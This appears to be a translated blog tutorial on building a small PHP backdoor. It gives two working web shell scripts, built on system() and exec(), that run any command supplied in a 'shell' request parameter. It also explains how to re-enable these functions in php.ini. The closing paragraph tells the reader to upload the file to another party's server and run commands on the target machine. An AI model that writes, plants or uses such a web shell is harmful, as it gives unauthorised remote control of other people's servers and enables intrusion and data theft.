php execute cmd/shell command Trojan/Ma small backdoor

php executes shell commands, you can use the following functions: 

string system ( string $command [, int &$return_var ] )
 
string exec ( string $command [, array &$output [, int &$return_var ]] )
 
void passthru ( string $command [, int &$return_var ] )

These three functions are all prohibited by default

If you want to use these functions,

We must first modify the php configuration file php.ini

Find the keyword disable_functions, delete these function names in this item

Then pay attention to restart apache.

 

　　First look at the two functions of system() and passthru() are similar and can be interchanged:

<?php
    #Get webpage passing parameters
    $shell = $_REQUEST['shell'];
    echo "<pre>";
    system($shell, $status);
    echo "</pre>";
    //Pay attention to the correspondence between the execution result of the shell command and the status value returned by the execution
    $shell = "<font color='red'>$shell</font>";
    if( $status ){
        echo "The execution of the shell command {$shell} failed";
    } else {
        echo "The shell command {$shell} was successfully executed";
    }
?>

 Access address and pass shell parameters

http://localhost:81/shell.php?shell=ipconfig

　　Note that system() will display the results immediately after the shell command is executed. This is more inconvenient, because sometimes we do not need to output the results immediately, or even output, so we can use exec()

　　

　　Example of using exec(): 

<?php
    $shell = $_REQUEST['shell'];
    exec($shell, $result, $status);
    $shell = "<font color='red'>$shell</font>";
    echo "<pre>";
    if( $status ){
        echo "The execution of the shell command {$shell} failed";
    } else {
        echo "The shell command {$shell} was successfully executed, and the result is as follows<hr>";
        print_r( $result );
    }
    echo "</pre>";
?>

exec() executes the shell command successfully, but does not return the result, you need to use the output command to output the result of $result

 

As a small backdoor, upload it to the website directory under the other party's server, visit the address, you can execute the command you want to execute on the target machine, and get the echo result.

Complete code download address